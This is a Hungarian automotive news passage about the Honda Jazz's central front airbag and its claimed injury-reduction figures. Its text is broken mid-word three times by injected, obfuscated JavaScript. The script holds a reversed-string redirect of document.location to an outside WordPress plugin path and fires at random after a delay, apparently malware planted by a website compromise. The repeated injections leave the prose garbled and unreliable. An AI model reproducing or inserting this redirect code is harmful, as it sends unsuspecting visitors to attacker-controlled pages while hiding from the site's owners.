Az új Jazz számos biztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonsági rendszere közül az első ülések közötti központi légzsákot hangsúlyozza ki leginkább a Honda. Joggal: habár nem számít már világújdonságnak, még mindig eléggé izgalmas és ritka biztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonsági rendszer, főleg ebben a méretoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosztályban. A vezetőülés oldaltámaszának felső szakaszán kapott helyet az az ívelt kialakítású légzsák, amely ütközés esetén a vezető és első utasa között nyílik ki. A Honda gyári tesztjei alapján a rendszer a vezető felől érkező ütések esetén 85, a túloldalról érkező oldalirányú ütközés esetén 98 százalékkal csökkenti a fejsérülés kockázatát. Az új Jazzben egyébként a hátsó utasok is kapnak oldallégzsákot; az ajtót és a C…
- Hirdetés -